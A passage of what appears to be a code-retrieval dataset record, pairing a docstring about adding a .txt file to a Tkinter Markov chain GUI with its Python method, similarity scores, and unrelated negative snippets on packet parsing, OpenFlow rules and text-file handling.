(eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow 
ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = 
parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)",
"def write(self, ostream):\n tstream = utils.BytearrayStream()\n\n if self._unique_identifier:\n self._unique_identifier.write(tstream)\n\n self.length = tstream.length()\n super(GetAttributeListRequestPayload, self).write(ostream)\n ostream.write(tstream.buffer)",
"def SendPacket(self, endpoint_addr, data):\n _, _, pipe = self._ep_fds[endpoint_addr]\n pipe.send(data)",
"def apply(self, pkt_list):\n pkt_list.summary()\n\n return pkt_list",
"def process_pkts(self, pkts: list):\n pkt_count = 0\n for ts, buf in pkts:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP):\n continue\n ip = eth.data\n if ((inet_to_str(ip.src) == self.sip and inet_to_str(ip.dst) == self.dip) or\n (inet_to_str(ip.src) == self.dip and inet_to_str(ip.dst) == self.sip)):\n if isinstance(ip.data, dpkt.tcp.TCP):\n tcp = ip.data\n if ((tcp.sport == self.sp and tcp.dport == self.dp) or\n (tcp.dport == self.sp and tcp.sport == self.dp)):\n pkt_count += 1\n self._process(buf, ts, pkt_count)\n if self._c_state == self._s_state and self._c_state == TCPState.CLOSED:\n logger.info(\"Session finished.\")\n logger.info(\"Number of packets in the session id: {} is {}\".format(\n self.session_count, len(self.sessions[self.session_count])))\n self.__reset_state__()",
"def handle_tcp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n sequence_num = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n acknowledgment = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n data_offset = int(pkt[start_point], 16) * 4\r\n start_point += 2\r\n flags = pkt[start_point:start_point+2]\r\n flags_str = \"\"\r\n for f in flags:\r\n flags_str += str(format(int(f), '04b'))\r\n start_point += 2\r\n window_size = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n start_point += 4\r\n urgent_pointer = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n options = int((2 * packets[i][0][0] - start_point)/2)\r\n\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(sequence_num)\r\n packets[i][2].append(acknowledgment)\r\n packets[i][2].append(data_offset)\r\n packets[i][2].append(flags_str)\r\n packets[i][2].append(window_size)\r\n packets[i][2].append(checksum_value)\r\n packets[i][2].append(urgent_pointer)\r\n packets[i][2].append(options)\r\n return packets",
"def send_packet(sender, payload):\n sender.write(payload)",
"def packets_for_stream(fobj, offset):\n pcap = dpkt.pcap.Reader(fobj)\n pcapiter = iter(pcap)\n ts, raw = pcapiter.next()\n\n fobj.seek(offset)\n for p in next_connection_packets(pcapiter, linktype=pcap.datalink()):\n yield p"
] |
[
"0.5825835",
"0.5745238",
"0.5683483",
"0.558449",
"0.5557022",
"0.5464802",
"0.54528224",
"0.5446074",
"0.54343146",
"0.53621197",
"0.532868",
"0.5285138",
"0.52766114",
"0.5175844",
"0.5172803",
"0.513203",
"0.51317626",
"0.51258296",
"0.51237726",
"0.5120732",
"0.51201624",
"0.5116703",
"0.5108795",
"0.50927794",
"0.5087931",
"0.5085977",
"0.5075281",
"0.50277793",
"0.5023833",
"0.5015895"
] |
0.6792502
|
0
|
Returns a list of all expected replies to the question `self` represents.
|
def get_expected_replies(self):
# () -> ([{"intent-name": str}])
return [cfg.INFORM_INTENT_PREFIX+self.slot_description["name"]]
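
A hypothetical use of the returned list is sketched below; the prefix value and the slot/intent names are placeholders, since the row does not show the real cfg module.

INFORM_INTENT_PREFIX = "inform_"   # assumed stand-in for cfg.INFORM_INTENT_PREFIX

slot_description = {"name": "departure_city"}
expected_replies = [INFORM_INTENT_PREFIX + slot_description["name"]]

incoming_intent = "inform_departure_city"
print(incoming_intent in expected_replies)   # True -> the user answered this question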
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def replies(self):\r\n return Replies(self)",
"def replies(self):\n keys = {}\n comments = self.comments.order('-score').fetch(1000)\n for comment in comments:\n keys[str(comment.key())] = comment\n comment.replies = []\n for comment in comments:\n parent_key = Comment.reply_to.get_value_for_datastore(comment)\n parent = keys.get(str(parent_key))\n if parent:\n parent.replies.append(comment)\n replies = [c for c in comments if not c.reply_to]\n prefetch_refprop(replies, Comment.author)\n return replies",
"def get_replies(self):\n url = \"https://api.imgur.com/3/comment/{0}/replies\".format(self.id)\n json = self._imgur._send_request(url)\n child_comments = json['children']\n return [Comment(com, self._imgur) for com in child_comments]",
"def answers_all(self):\n return self.answer_set.all()",
"def questions(self):\n return self._questions",
"def get_questions(self):\n for q in self._objects[\"Questions\"]:\n yield (q)\n\n return",
"def get_replies(self, new=True):\n url = (\"https://api.imgur.com/3/account/{0}/\"\n \"notifications/replies\".format(self.name))\n return self._imgur._send_request(url, needs_auth=True)",
"def correct_answers(self):\n return self.answer_set.filter(active=True, correct=True)",
"def answers(self):\n assert self._answer_count\n for ii in self._answer_count:\n yield ii",
"def get_answers(self):\r\n pass",
"def get_questions(self):\n\t\treturn handle_to_object(call_sdk_function('PrlSrv_GetQuestions', self.handle))",
"def get_answers(self):\n result = self.answers \n\n self.answers = []\n\n return result",
"def answers(self):\n from quiz.models import Answer\n qids = self.values_list('id', flat=True)\n return Answer.objects.filter(\n question__id__in=qids).select_related('question')",
"def get_questions(self):\n\t\treturn handle_to_object(call_sdk_function('PrlVm_GetQuestions', self.handle))",
"def __iter__(self):\n return self.questions.__iter__()",
"def get_questions(self):\n self.post_question()\n return self.client.get(\"api/v2/questions\", headers={\"Authorization\": \"{}\".format(self.token())}, data=json.dumps(self.question), content_type='application/json')",
"def get_answers(self):\r\n return self.answer_values",
"def all_responses(self):\n questions = []\n contexts = []\n all_responses = []\n for response in self.responses:\n if response.question.text not in questions:\n questions.append(response.question.text)\n if response.context.text not in contexts:\n contexts.append(response.context.text)\n for question in questions:\n for context in contexts:\n answers = most_common_response_by_question_and_context(\n self.responses,\n question,\n context,\n )\n response_by_question_and_context = {\n 'question': question,\n 'context': context,\n 'answers': answers\n }\n all_responses.append(response_by_question_and_context)\n\n return all_responses",
"def _add_quick_replies(self, qr):\n result = list()\n next_nodes = self.next_nodes.split(\",\")\n\n for idx, quick_reply in enumerate(qr):\n result.append({\n \"title\": quick_reply,\n 'payload': next_nodes[idx],\n 'content_type': \"text\"\n })\n\n return result",
"def get_all_questions(self):\n query = (\"SELECT * FROM tbl_questions;\")\n user_reqeusts = get_just_query(query)\n return user_reqeusts",
"def get_list_answers(self, obj):\n return []",
"def get_message_replies(self, mid):\n pass",
"def get_rel_elements(self):\n return self.merged_root.findall('OrgQuestion/Thread/RelQuestion')",
"def correct_answers(self):\n return self.tasks.filter(answer=F('question__solution')).count()",
"def evaluate_questions(self):\n for question in self.question_list:\n question.evaluate_question()",
"def get_question_answers(self):\r\n # dict of (id, correct_answer)\r\n answer_map = dict()\r\n for response in self.responders.keys():\r\n results = self.responder_answers[response]\r\n answer_map.update(results)\r\n\r\n # include solutions from <solution>...</solution> stanzas\r\n for entry in self.tree.xpath(\"//\" + \"|//\".join(solution_tags)):\r\n answer = etree.tostring(entry)\r\n if answer:\r\n answer_map[entry.get('id')] = contextualize_text(answer, self.context)\r\n\r\n log.debug('answer_map = %s', answer_map)\r\n return answer_map",
"def __debug_print_questions__(self):\n for k in sorted(self.questions.keys()):\n print(\"Question: %s\" %k)\n for a in self.questions[k].answers:\n print(\"\\t%s\" % a)",
"def create_reply_all(self):\n return MessageCreateReplyAllRequestBuilder(self.append_to_request_url(\"createReplyAll\"), self._client)",
"def extract_questions_from_text(self, text):\n questions = []\n\n for match in self.QUESTION_RE.finditer(text):\n match_dict = match.groupdict()\n\n answer_type = match_dict['answer_type']\n number1 = match_dict.pop('number1')\n\n if answer_type == 'O':\n if re.search('(?i)to ask the Deputy President', match_dict['intro']):\n match_dict['dp_number'] = number1\n elif re.search('(?i)to ask the President', match_dict['intro']):\n match_dict['president_number'] = number1\n else:\n match_dict['oral_number'] = number1\n elif answer_type == 'W':\n match_dict['written_number'] = number1\n\n match_dict['translated'] = bool(match_dict['translated'])\n match_dict['questionto'] = match_dict['questionto'].replace(':', '')\n match_dict['questionto'] = self.correct_minister_title(match_dict['questionto'])\n\n questions.append(match_dict)\n\n return questions",
"def iterate_by(self, iter_type: str,\n is_utterance_question: Callable[[str], bool]) -> Generator[Tuple[str, str, str], None, None]:\n i = -1\n for utterance in self.utterances.values():\n if utterance.reply_to is not None:\n root_text = self.utterances[utterance.reply_to].text\n if is_utterance_question(root_text):\n i += 1\n if iter_type == 'answers':\n pair_idx = utterance.reply_to + pair_delim + str(utterance.id)\n yield utterance.id, utterance.text, pair_idx\n continue\n question = self.utterances[utterance.reply_to]\n pair_idx = str(question.id) + pair_delim + str(utterance.id)\n yield question.id, question.text, pair_idx\n if iter_type == 'both':\n pair_idx = utterance.reply_to + pair_delim + str(utterance.id)\n yield utterance.id, utterance.text, pair_idx"
] |
[
"0.6508348",
"0.61938727",
"0.6090138",
"0.60633636",
"0.60112613",
"0.59839123",
"0.58777964",
"0.5870995",
"0.58363676",
"0.58160585",
"0.5789464",
"0.57393974",
"0.5715851",
"0.56585544",
"0.56292933",
"0.5616232",
"0.55927455",
"0.5582778",
"0.555033",
"0.5545911",
"0.554136",
"0.54683197",
"0.54306376",
"0.53699666",
"0.5332629",
"0.530675",
"0.52955776",
"0.52654743",
"0.5208469",
"0.52050096"
] |
0.6340167
|
1
|
Finds and adds the contents of a .txt file the user wants to add to this GUI's Markov Chain
|
def find_file(self):
selected_file = tk.filedialog.askopenfilename(initialdir='/', title='Select File',
filetypes=(('txt Files', '*.txt'), ('All Files', '*.*')))
self.markov_chain.add_file(selected_file)
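
As a side note, tk.filedialog is only usable once tkinter.filedialog has been imported somewhere; a minimal standalone sketch of the same pick-a-.txt-and-ingest pattern, with a stub in place of the GUI's MarkovChain, is shown below (illustrative only).

import tkinter as tk
from tkinter import filedialog

class MarkovChainStub:
    def add_file(self, path):
        # stand-in for the GUI's markov_chain.add_file: just report what would be ingested
        with open(path, "r", encoding="utf8", errors="ignore") as f:
            print(f"ingested {len(f.read())} characters from {path}")

root = tk.Tk()
root.withdraw()                      # no main window needed just to show the dialog
selected = filedialog.askopenfilename(
    title="Select File",
    filetypes=(("txt Files", "*.txt"), ("All Files", "*.*")))
if selected:                         # askopenfilename returns "" on cancel
    MarkovChainStub().add_file(selected)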
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_add_1(self):\n contents = testdata.get_words()\n d = testdata.create_dir()\n ts = {\n \"foo.txt\": [contents],\n }\n ds = d.add(ts)\n path = ds[0]\n self.assertTrue(os.path.isfile(path), \"{} does not exist\".format(path))\n self.assertEqual(contents, path.read_text())",
"def add_file(self, filename):\n f = open(filename, 'r', encoding='utf8', errors='ignore')\n text = f.read()\n f.close()\n self.add_string(text)",
"def text_reader(file_path,text_edit):\n\n parent.ui.textEdit_design_image.clear()\n path = os.getcwd()+'\\media\\docs' + file_path\n f = open(path,'r');\n for x in f:\n text_edit.insertPlainText(x)",
"def Run():\n file_name = AskForFileName()\n file_content = ReadFileContents(file_name)\n head_list = BuildHeadList(file_content)\n atom_list = BuildAtomList(file_content)\n tail_list = BuildTailList(file_content)\n WriteNewFile(head_list, atom_list, tail_list)",
"def createTXT(self):\n now = dt.datetime.now().strftime(\"%m-%d %H-%M\")\n self.filename = \"bwcca_tags \" + now\n try:\n if \"/\" in self.dir_lbl[\"text\"]:\n desired_list = self.phraseMaker()\n with open(f\"{self.folder}/{self.filename}.txt\", \"w\") as f:\n for i in desired_list:\n f.write(f\"{i}\\n\")\n self.stat_lbl[\"text\"] = f\"/{self.filename} created!\"\n else:\n self.dir_lbl[\"text\"] = \"Select a folder!\"\n self.dir_btn.focus()\n except Exception as e:\n self.dir_lbl[\"text\"] = e",
"def mark(self):\n\n if self.selected_text_file is None:\n return\n # selectedText = self.textBrowser.textCursor().selectedText()\n pos0 = self.ui.textBrowser.textCursor().selectionStart()\n pos1 = self.ui.textBrowser.textCursor().selectionEnd()\n if pos0 == pos1:\n return\n # add new item to case_text list and database and update GUI\n item = {'caseid': self.case['caseid'],\n 'fid': self.selected_text_file[ID],\n 'pos0': pos0, 'pos1': pos1,\n 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().astimezone().strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'memo': \"\"}\n self.case_text.append(item)\n self.highlight()\n\n cur = self.app.conn.cursor()\n # Check for an existing duplicated linkage first\n cur.execute(\"select * from case_text where caseid=? and fid=? and pos0<=? and pos1>=?\",\n (item['caseid'], item['fid'], item['pos0'], item['pos1']))\n result = cur.fetchall()\n if len(result) > 0:\n Message(self.app, _(\"Already Linked\"),\n _(\"This segment has already been linked to this case\"), \"warning\").exec()\n return\n cur.execute(\"insert into case_text (caseid,fid, pos0, pos1, owner, date, memo) values(?,?,?,?,?,?,?)\",\n (\n item['caseid'], item['fid'], item['pos0'], item['pos1'], item['owner'], item['date'], item['memo']))\n self.app.conn.commit()\n # File may not be assigned in the table widget as Yes\n self.get_files()\n self.fill_table()\n self.app.delete_backup = False",
"def __init__(self, master):\n self.master = master\n self.master.resizable(False, False)\n self.master.title('Markov Babbler')\n self.markov_chain = mc.MarkovChain()\n\n # Constants\n self.button_height = 2\n self.button_width = 21\n self.button_off_color = 'Light Grey'\n self.button_on_color = 'Dark Grey'\n self.button_column_span = 2\n self.spinbox_length = 3\n self.number_of_sentences = 12\n self.options_column = 11\n self.min_sentence_length = 10\n self.max_sentence_length = 20\n\n # Displays babbler's output\n self.display_frame = tk.Frame(master)\n self.display_frame.grid(row=0, rowspan=12, column=0, columnspan=10)\n\n self.display_scrollbar = tk.Scrollbar(self.display_frame)\n\n self.display = tk.Text(self.display_frame, height=18, width=80, bg='WHITE', borderwidth=3,\n relief=\"groove\", wrap='word')\n self.display.config(yscrollcommand=self.display_scrollbar.set)\n self.display_scrollbar.config(command=self.display.yview)\n self.display.pack(side='left')\n self.display_scrollbar.pack(side='right', fill='y')\n\n # Selects .txt file to add to this window's Markov Chain\n self.select_file = tk.Button(master, text='Add File', height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.find_file)\n self.select_file.grid(row=0, column=self.options_column, columnspan=self.button_column_span)\n\n # Adds user entered text to this Markov Chain\n self.user_string_row = 1\n\n self.user_string_entry = tk.Entry(self.master)\n self.user_string_entry.insert(0, 'Add text here!')\n self.user_string_entry.grid(row=self.user_string_row, column=self.options_column)\n\n self.user_string_button = tk.Button(self.master, text='Enter', bg=self.button_off_color,\n activebackground=self.button_on_color, command=self.add_user_text)\n self.user_string_button.grid(row=self.user_string_row, column=self.options_column+1)\n\n # Changes the Markov Chains's order\n self.order_row = 2\n self.order_selection_label = tk.Label(master, text='Markov Chain Order')\n self.order_selection_label.grid(row=self.order_row, column=self.options_column)\n\n self.initial_order_value = tk.StringVar(master)\n self.initial_order_value.set(str(self.markov_chain.order))\n\n self.order_selection = tk.Spinbox(master, values=tuple(range(1, 11)),\n width=self.spinbox_length,\n command=self.recompute_markov_chain)\n self.order_selection.config(textvariable=self.initial_order_value)\n self.order_selection.grid(row=self.order_row, column=self.options_column + 1)\n\n # Select the number sentences for the Markov Chain to output\n self.num_sentences_row = 3\n self.num_sentences_label = tk.Label(master, text='Number of Sentences')\n self.num_sentences_label.grid(row=self.num_sentences_row, column=self.options_column)\n\n self.initial_num_sentences = tk.StringVar(master)\n self.initial_num_sentences.set(str(self.number_of_sentences))\n\n self.num_sentences = tk.Spinbox(master, values=tuple(range(1, 51)),\n width=self.spinbox_length,\n command=self.set_number_of_sentences)\n self.num_sentences.config(textvariable=self.initial_num_sentences)\n self.num_sentences.grid(row=self.num_sentences_row, column=self.options_column + 1)\n\n # Set minimum sentence length for each of the Markov Chain's sentence outputs\n self.min_sentence_row = 4\n\n self.min_sentence_label = tk.Label(master, text='Min Sentence Length')\n self.min_sentence_label.grid(row=self.min_sentence_row, column=self.options_column)\n\n self.initial_min_sentence = tk.StringVar(master)\n 
self.initial_min_sentence.set(str(self.min_sentence_length))\n\n self.set_min_sentence = tk.Spinbox(master, values=tuple(range(1, 100)),\n width=self.spinbox_length,\n command=self.set_min_sentence_length)\n self.set_min_sentence.config(textvariable=self.initial_min_sentence)\n self.set_min_sentence.grid(row=self.min_sentence_row, column=self.options_column+1)\n\n # Set maximum sentence length for each of the Markov Chain's sentence outputs\n self.max_sentence_row = 5\n\n self.max_sentence_label = tk.Label(master, text='Max Sentence Length')\n self.max_sentence_label.grid(row=self.max_sentence_row, column=self.options_column)\n\n self.initial_max_sentence = tk.StringVar(master)\n self.initial_max_sentence.set(str(self.max_sentence_length))\n\n self.set_max_sentence = tk.Spinbox(master, values=tuple(range(2, 101)),\n width=self.spinbox_length,\n command=self.set_max_sentence_length)\n self.set_max_sentence.config(textvariable=self.initial_max_sentence)\n self.set_max_sentence.grid(row=self.max_sentence_row, column=self.options_column+1)\n\n # Radio buttons controlling if this GUI's Markov Chain should work with words or individual chars.\n self.words_or_char_row = 6\n self.master_variable = tk.StringVar()\n self.words_radio_button = tk.Radiobutton(master, text='Words', variable=self.master_variable, value='a',\n command=self.set_markov_chain_to_words)\n self.chars_radio_button = tk.Radiobutton(master, text='Chars', variable=self.master_variable, value='b',\n command=self.set_markov_chain_to_chars)\n self.words_radio_button.select()\n self.words_radio_button.grid(row=self.words_or_char_row, column=self.options_column)\n self.chars_radio_button.grid(row=self.words_or_char_row, column=self.options_column+1)\n\n # Generates a new batch of output from the Markov Chain, based off current constants like order, min/max\n # sentence length, etc.\n self.generate = tk.Button(master, text=\"Generate Text\", height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.generate_babble_text)\n self.generate.grid(row=7, column=self.options_column, columnspan=self.button_column_span)\n\n # Saves the Markov Chain output last outputted to .txt file\n self.save_file = tk.Button(master, text='Save Text', height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.save_babble)\n self.save_file.grid(row=8, column=self.options_column, columnspan=self.button_column_span)",
"def open_file():\n filepath = askopenfilename(\n filetypes=[(\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")]\n )\n if not filepath:\n return\n txt_edit.delete(1.0, tk.END)\n with open(filepath, \"r\") as input_file:\n text = input_file.read()\n txt_edit.insert(tk.END, text)\n window.title(f\"Simple Text Editor - {filepath}\")",
"def cmd_wq(self):\n out_file = open(\"DoubleLinkedList.txt\", \"w\")\n out_file.write(str(self.get_text()))\n out_file.close()\n print(\"File saved to DoubleLinkedList.txt\")",
"def add_file(self, filename):\n f = open(filename, 'r', encoding='utf8', errors='ignore')\n text = f.read()\n f.close()\n self.add_string(text)",
"def load_from_file(self, file_path):\n for line in open(file_path, 'r'):\n term = line.rstrip('\\n')\n self.add(term)",
"def add_file(self, filename):\r\n f = open(filename, 'r', encoding='utf8', errors='ignore')\r\n text = f.read()\r\n self.add_string(text)\r\n f.close()",
"def file_open(self):\n filename, _ = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File')\n\n with open(filename, 'r', encoding=\"utf8\") as file:\n self.file_cont = file.readlines()\n self.textToAnalize.setText(''.join(self.file_cont))",
"def main():\n\n args = get_args()\n text = args.text\n mutations = args.mutations\n random.seed(args.seed)\n alpha = ''.join(sorted(string.ascii_letters + string.punctuation))\n\n new_text_line = []\n if os.path.isfile(text):\n print('You said: ', end='')\n for line in open(text, 'rt'):\n new_text_line = list(line.rstrip())\n print(f'\"{line.rstrip()}\"')\n len_text = len(line.rstrip())\n num_mutations = round(len_text * mutations)\n for i in random.sample(range(len_text), num_mutations):\n # print(f'i = {i}, char = {line[i]}, index = {alpha.find(line[i])}')\n # list.index 함수로 색인 위치 찾으면 없을때 error 발생. 있는지 확인하고 쓰던가 아니면 find 함수 쓸 것!!\n # find 반환값 : 색인 위치. 찾을 수 없는 경우 -1 반환\n new_text_line[i] = random.choice(alpha.replace(line[i], '')) # replace 함수는 line[i] 에 해당하는 문자가 alpha에 '있으면' 해당 문자를 치환한다. 없어도 error 안 남.\n print(f'I heard : \"' + ''.join(new_text_line)+ '\"')\n else:\n print(f'You said: \"{text}\"')\n new_text_line = list(text)\n len_text = len(text)\n num_mutations = round(len_text * mutations)\n for i in random.sample(range(len_text), num_mutations):\n new_text_line[i] = random.choice(alpha.replace(text[i], ''))\n print(f'I heard : \"' + ''.join(new_text_line)+ '\"')",
"def saveTexts(self):\n if self.currentItem is not None:\n # Get name of selected file in the List\n currentItempath = path.join(self.workDir, self.currentItem)\n # Pure-text annotation\n filepath_cor = currentItempath + TEXT_ANNO_EXT\n cor_text = self.TextCorr.GetValue().strip()\n self.editFile(filepath_cor, cor_text, self.PlayList.setTextAnno)\n # XML annotation\n filepath_xcor = currentItempath + XML_ANNO_EXT\n xcor_text = self.XMLCorr.GetValue().strip()\n self.editFile(filepath_xcor, xcor_text, self.PlayList.setXMLAnno)\n # Command annotation\n filepath_cmd = currentItempath + CMD_ANNO_EXT\n cmd_text = self.CorrCommand.GetValue().strip()\n self.editFile(filepath_cmd, cmd_text, self.PlayList.setCommandAnno)\n # Annotator comments\n filepath_nfo = currentItempath + COMMENT_EXT\n nfo_text = self.Comments.GetValue().strip()\n self.editFile(filepath_nfo, nfo_text, None)",
"def browse_files_in(self,*args):\n path_to_data = tkFileDialog.askopenfilename()\n #show chosen value in textframe\n self.docstring.delete(0,tk.END)\n self.docstring.insert(0,path_to_data)\n #use chosen value as self.data_file\n self.data_file.set(path_to_data)",
"def main():\n # call open_file() to get file pointer \n fd = open_file()\n # call fill completion to get dict, then close the openned file\n full_set = create_dict(fd)\n wrds = find_words(full_set)\n print(wrds)\n fd.close()\n # ask for a prefix in while loop",
"def add_file(self, filename):\n f = open(filename, 'r', encoding='utf8', errors='ignore')\n text = f.read()\n f.close()\n \n self.add_string(text)",
"def browse_files_out(self,*args):\n path_to_data = tkFileDialog.askopenfilename()\n #show chosen value in textframe\n self.docstring_offers.delete(0,tk.END)\n self.docstring_offers.insert(0,path_to_data)\n #use chosen value as self.exchanged_offers_filepa\n self.exchanged_offers_filepath.set(path_to_data)",
"def add_user_text(self):\n text_to_add = self.user_string_entry.get()\n self.user_string_entry.delete(0, tk.END)\n self.markov_chain.add_string(text_to_add)",
"def addContent(text):",
"def main():\n filepath = input(\"Enter the Source File: \")\n with open(filepath, encoding=\"utf-8\") as f:\n sentences = f.readlines()\n sentences = \" \".join(sentences)\n\n summary = summarize_sentences(sentences)\n\n filepath_index = filepath.find(\".txt\")\n outputpath = filepath[:filepath_index] + \"_lexRank.txt\"\n\n with open(outputpath, \"w\") as w:\n for sentence in summary:\n w.write(str(sentence) + \"\\n\")",
"def open_file(event):\r\n\r\n filepath = askopenfilename(\r\n\r\n filetypes=[(\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")]\r\n\r\n )\r\n\r\n if not filepath:\r\n\r\n return\r\n\r\n # Si se abre un archivo esta línea borra todo el contenido de el text Area\r\n txt_Area.delete(\"1.0\", tk.END)\r\n\r\n # Se abre el archivo\r\n with open(filepath, \"r\") as input_file:\r\n\r\n # Se lee el archivo\r\n text = input_file.read()\r\n\r\n # Se inserta el archivo\r\n txt_Area.insert(tk.END, text)\r\n\r\n window.title(f\"Simple Text Editor - {filepath}\")",
"def main():\n grid = make_grid(3, 3) # change to 3x3\n dictionary = get_dictionary(\"words.txt\")\n words = search(grid, dictionary)\n display_words(words)",
"def file_update(self, data):\n file = open(\"../util/LinkedList_File\", \"r+\")\n file.truncate(0)\n file.close()\n if self.search_item(data) == True:\n self.remove(data)\n file = open(\"../util/LinkedList_File\", \"a+\")\n\n orderedlist_content = []\n orderedlist_content = self.display_content()\n\n for i in orderedlist_content:\n file.write(i + \" \", )\n file.close()\n file = open(\"../util/LinkedList_File\", \"r\")\n for i in file:\n print(i)\n file.close()\n else:\n self.add(data)\n\n file = open(\"../util/LinkedList_File\", \"a+\")\n\n orderedlist_content = []\n orderedlist_content = self.display_content()\n\n for i in orderedlist_content:\n file.write(i + \" \")\n file.close()\n\n file = open(\"../util/LinkedList_File\", \"r\")\n for i in file:\n print(i)\n file.close()",
"def test_add_word_in_file(self):\n pass",
"def load(self, file_name):\n try:\n [self.add_word(w) for w in open(file_name).read().splitlines()]\n except IOError as e:\n print(e)",
"def loadCodeFromFile():\n global notes_text\n\n notes_text.delete(\"1.0\", END)\n load_interface = Tk()\n load_interface.filename = filedialog.askopenfilename( initialdir = (\"../Templates\") ,title = \"Select file\",filetypes = ((\"Bit Tune File\",\"*.btu\"),(\"All Files\",\"*.*\")))\n load_interface.destroy()\n\n with open (load_interface.filename, 'r') as f:\n code = f.read()\n notes_text.insert(END, str(code))",
